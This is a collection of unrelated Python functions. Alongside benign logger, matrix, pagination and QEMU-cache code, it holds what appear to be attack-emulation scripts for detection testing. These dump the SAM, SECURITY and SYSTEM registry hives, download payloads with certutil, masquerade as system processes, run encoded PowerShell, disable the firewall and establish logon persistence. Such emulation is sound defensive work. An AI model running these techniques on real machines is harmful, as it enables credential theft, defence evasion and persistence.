def configure_modbus_logger(cfg, recycle_logs=True): """ Configure the logger. Args: cfg (Namespace): The PUReST config namespace. """ logger = logging.getLogger("modbus_tk") if isinstance(cfg, dict): cfg = Configuration(**cfg) if cfg.no_modbus_log: logger.setLevel(logging.ERROR) logger.addHandler(logging.NullHandler()) else: logger.setLevel(logging.DEBUG) fmt = "%(asctime)s - %(levelname)s - " "%(module)s::%(funcName)s @ %(lineno)d - %(message)s" fmtr = logging.Formatter(fmt) if not cfg.no_modbus_console_log: sh = logging.StreamHandler() sh.setFormatter(fmtr) sh.setLevel(cfg.modbus_console_log_level.upper()) logger.addHandler(sh) if not cfg.no_modbus_file_log: modbus_log = path(cfg.modbus_log) if recycle_logs: remove_file(modbus_log) make_dir(os.path.dirname(modbus_log)) fh = logging.FileHandler(modbus_log) fh.setFormatter(fmtr) fh.setLevel(cfg.modbus_file_log_level.upper()) logger.addHandler(fh)
def execute_matrix_generator(self): print('Gen matrix...') self.matrix_a = self._gen_matrix() self.matrix_b = self._gen_matrix() remove_file(self.file_name) print('Saving to file...') save_matrix(self.file_name, self.matrix_a) save_matrix(self.file_name, self.matrix_b) return self.file_name
def main(): for hive in ["sam", "security", "system"]: filename = os.path.abspath("%s.reg" % hive) common.log("Exporting %s hive to %s" % (hive, filename)) common.execute( [REG, "save", "hkey_local_machine\\%s" % hive, filename]) common.remove_file(filename) common.execute([REG, "save", "hklm\\%s" % hive, filename]) common.remove_file(filename)
def run(): print(" > Testing pagination using the last document's _id (find/limit)") common.remove_file(FILE_NAME) start_time = time.time() _run() seconds_elapsed = time.time() - start_time time_msg = ('Time elapsed %s (find limit)' % common.format_time(seconds_elapsed)) print(time_msg) common.append_to_file('times', time_msg) print('Data is in %s' % FILE_NAME) return FILE_NAME
def run(): print(' > Testing skip limit pagination') common.remove_file(FILE_NAME) start_time = time.time() _run() seconds_elapsed = time.time() - start_time time_msg = ('Time elapsed %s (skip limit)' % common.format_time(seconds_elapsed)) print(time_msg) common.append_to_file('times', time_msg) print('Data is in %s' % FILE_NAME) return FILE_NAME
def main(): # http server will terminate on main thread exit # if daemon is True server, ip, port = common.serve_web() uri = "bin/mydll.dll" target_file = "mydll.dll" common.clear_web_cache() url = "http://{ip}:{port}/{uri}".format(ip=ip, port=port, uri=uri) common.execute(["certutil.exe", "-urlcache", "-split", "-f", url, target_file]) server.shutdown() common.remove_file(target_file)
def main(): masquerades = [ "svchost.exe", "lsass.exe", "services.exe", "csrss.exe", ] for name in masquerades: path = os.path.abspath(name) common.copy_file(MY_APP, path) common.execute(path, timeout=3, kill=True) common.remove_file(path)
def proccess_matrix_summary(self): print('Read matrix...') file_name = self.file_loader.get_file() res = self._read_matrix(file_name) if not res: return print('Sum matrix') matrix_a, matrix_b = res file_name = get_files_directory() + 'F1.txt' new_matrix = self._sum_matrix(matrix_a, matrix_b) print('Saving to file...') remove_file(file_name) save_matrix(file_name, new_matrix) return new_matrix
def main(): common.log("Encoding target") encoded_file = os.path.abspath('encoded.txt') decoded_file = os.path.abspath('decoded.exe') common.execute( "c:\\Windows\\System32\\certutil.exe -encode c:\\windows\\system32\\cmd.exe %s" % encoded_file) common.log("Decoding target") common.execute("c:\\Windows\\System32\\certutil.exe -decode %s %s" % (encoded_file, decoded_file)) common.log("Cleaning up") common.remove_file(encoded_file) common.remove_file(decoded_file)
def main(): common.log("MsBuild Beacon") server, ip, port = common.serve_web() common.clear_web_cache() common.log("Updating the callback http://%s:%d" % (ip, port)) target_task = "tmp-file.csproj" common.copy_file(common.get_path("bin", "BadTasks.csproj"), target_task) new_callback = "http://%s:%d" % (ip, port) common.patch_regex(target_task, common.CALLBACK_REGEX, new_callback) common.execute([MS_BUILD, target_task]) common.remove_file(target_task) server.shutdown()
def main(): common.log("PowerShell Suspicious Commands") temp_script = os.path.abspath("tmp.ps1") # Create an empty script with open(temp_script, "wb") as f: f.write("whoami.exe\n") powershell_commands = [ 'powershell -encoded %s' % encode('ping google.com'), 'powershell.exe -ExecutionPol Bypass %s' % temp_script, 'powershell.exe iex Get-Process', 'powershell.exe -ec %s' % encode('Get-Process' + ' ' * 1000), ] for command in powershell_commands: common.execute(command) common.remove_file(temp_script)
def main(): server, ip, port = common.serve_web() common.clear_web_cache() target_app = "mydotnet.exe" common.patch_file(MY_DOT_NET, common.wchar(":8000"), common.wchar(":%d" % port), target_file=target_app) install_util64 = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe" install_util86 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe" fallback = False if os.path.exists(install_util64): install_util = install_util64 elif os.path.exists(install_util86): install_util = install_util86 else: install_util = None fallback = True if not fallback: common.clear_web_cache() common.execute([ install_util, '/logfile=', '/LogToConsole=False', '/U', target_app ]) else: common.log("Unable to find InstallUtil, creating temp file") install_util = os.path.abspath("InstallUtil.exe") common.copy_file(sys.executable, install_util) common.execute([ install_util, "-c", "import urllib; urllib.urlopen('http://%s:%d')" % (common.LOCAL_IP, port) ]) common.remove_file(install_util) common.remove_file(target_app) server.shutdown()
def main(): status = common.run_system() if status is not None: return status common.log("System Restore Process Evasion") program_path = common.get_path("bin", "myapp.exe") common.log("Finding a writeable directory in %s" % SYSTEM_RESTORE) target_directory = common.find_writeable_directory(SYSTEM_RESTORE) if not target_directory: common.log("No writeable directories in System Restore. Exiting...", "-") return common.UNSUPPORTED_RTA target_path = os.path.join(target_directory, "restore-process.exe") common.copy_file(program_path, target_path) common.execute(target_path) common.log("Cleanup", log_type="-") common.remove_file(target_path)
def main(): common.log("MS Office unusual child process emulation") suspicious_apps = [ "msiexec.exe /i blah /quiet", "powershell.exe exit", "wscript.exe //b", ] cmd_path = "c:\\windows\\system32\\cmd.exe" for office_app in ["winword.exe", "excel.exe"]: common.log("Emulating %s" % office_app) office_path = os.path.abspath(office_app) common.copy_file(cmd_path, office_path) for command in suspicious_apps: common.execute('%s /c %s' % (office_path, command), timeout=5, kill=True) common.log('Cleanup %s' % office_path) common.remove_file(office_path)
def main(): common.log("NetSH Advanced Firewall Configuration", log_type="~") netsh = "netsh.exe" rules_file = os.path.abspath("fw.rules") # Check to be sure that fw.rules does not already exist from previously running this script common.remove_file(rules_file) common.log("Backing up rules") common.execute([netsh, "advfirewall", "export", rules_file]) common.log("Disabling the firewall") common.execute( [netsh, "advfirewall", "set", "allprofiles", "state", "off"]) common.log("Enabling the firewall") common.execute([netsh, "advfirewall", "set", "allprofiles", "state", "on"]) common.log("Undoing the firewall change", log_type="-") common.execute([netsh, "advfirewall", "import", rules_file]) common.remove_file(rules_file)
def main(): common.log("Persistent Scripts") if common.check_system(): common.log("Must be run as a non-SYSTEM user", log_type="!") return 1 # Remove any existing profiles user_profile = os.environ['USERPROFILE'] log_file = os.path.join(user_profile, NAME + ".log") # Remove log file if exists common.remove_file(log_file) common.log("Running VBS") common.execute(["cscript.exe", VBS]) # Let the script establish persistence, then read the log file back time.sleep(5) common.print_file(log_file) common.remove_file(log_file) # Now trigger a 'logon' event which causes persistence to run common.log("Simulating user logon and loading of profile") common.execute(["taskkill.exe", "/f", "/im", "explorer.exe"]) time.sleep(2) common.execute(["C:\\Windows\\System32\\userinit.exe"], wait=True) common.execute(["schtasks.exe", "/run", "/tn", NAME]) # Wait for the "logon" to finish time.sleep(30) common.print_file(log_file) # Now delete the user profile common.log("Cleanup", log_type="-") common.remove_file(log_file)
def __init__(self, workdspace): self.runfile = path.join(workdspace, "drun.sh") remove_file(self.runfile) self.fopen = open(self.runfile, 'w') self.fopen.write(BASE_CONTENT)
def remove_cache(self): if self.qvc: self.qvc = None self.qvc_is_ready = False remove_file(self.qvc_path)
def co_init_cache(self): if self.qvc is not None: raise MultipleQVCInitialization(self.src_path) qvc_file_name = u"qvc_" + self.commit_sha + u".py" qvc_path = self.qvc_path = join(self.build_path, qvc_file_name) qemu_heuristic_hash = calculate_qh_hash() yield True if not isfile(qvc_path): yield self.co_check_untracked_files() self.qvc = QemuVersionCache() # make new QVC active and begin construction prev_qvc = self.qvc.use() for path in self.include_paths: yield Header.co_build_inclusions(path) self.qvc.list_headers = self.qvc.stc.create_header_db() yield self.co_check_modified_files() yield self.co_gen_device_tree() # gen version description yield self.qvc.co_computing_parameters(self.repo) self.qvc.version_desc[QVD_QH_HASH] = qemu_heuristic_hash # Search for PCI Ids PCIClassification.build() yield True PyGenerator().serialize(open(qvc_path, "wb"), self.qvc) else: self.load_cache() # make just loaded QVC active prev_qvc = self.qvc.use() if self.qvc.list_headers is not None: yield True self.qvc.stc.load_header_db(self.qvc.list_headers) yield True # verify that the version_desc is not outdated is_outdated = False try: checksum = self.qvc.version_desc[QVD_QH_HASH] except KeyError: is_outdated = True else: if not checksum == qemu_heuristic_hash: is_outdated = True if is_outdated: remove_file(qvc_path) yield self.qvc.co_computing_parameters(self.repo) self.qvc.version_desc[QVD_QH_HASH] = qemu_heuristic_hash PyGenerator().serialize(open(qvc_path, "wb"), self.qvc) yield True # set Qemu version heuristics according to current version initialize_version(self.qvc.version_desc) yield True # initialize Qemu types in QVC get_vp()["qemu types definer"]() get_vp()["msi_init type definer"]() if prev_qvc is not None: prev_qvc.use() self.qvc_is_ready = True